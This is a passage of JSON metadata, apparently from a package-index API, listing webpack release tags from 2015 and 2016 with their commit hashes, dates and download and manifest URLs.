ebpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c